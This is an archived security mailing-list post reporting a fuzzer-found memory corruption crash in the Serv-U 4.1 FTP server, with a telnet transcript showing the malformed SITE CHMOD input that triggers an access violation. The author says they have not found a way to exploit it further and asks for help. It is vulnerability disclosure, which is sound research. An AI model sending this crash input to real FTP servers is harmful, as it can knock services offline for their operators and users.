lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <403137CE.8070306@bastart.eu.org>
From: maillist at bastart.eu.org (Some Guy)
Subject: Serv-U 4.1 Memory Corruption / Whatever

Well, I didn't have the time to fully analyze it yet, but by using a 
fuzzer to check
Serv-U, I found something that crashed it using bad data in SITE CHMOD. 
This is
not the already discovered vulnerability, cause it can be used without 
write access,
the crash occurs before permissions are even checked. Seems like an 
off-by-two,
cause you can control 2 bytes of a dword where your buffer gets written, 
but I wasn't
able to find how the other 2 bytes are controlled yet, and I wasn't able 
to do anything
useful with the 2 bytes I have cause they can't be NULL. Well, I hope 
someone can
enlighten me a little, cause I tried the last 2 days and now I'm out of 
ideas.

hello@...xy:~# telnet ftp.target.com 21
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 Serv-U FTP Server v4.0 for WinSock ready...
USER myuser
331 User name okay, need password.
PASS mypass
230 User logged in, proceed.
SITE CHMOD 666 \\...\UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
Connection closed by foreign host.
hello@...xy:~#

this will cause this an ccess violation writing to 0x555551AD (UUQ-)


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ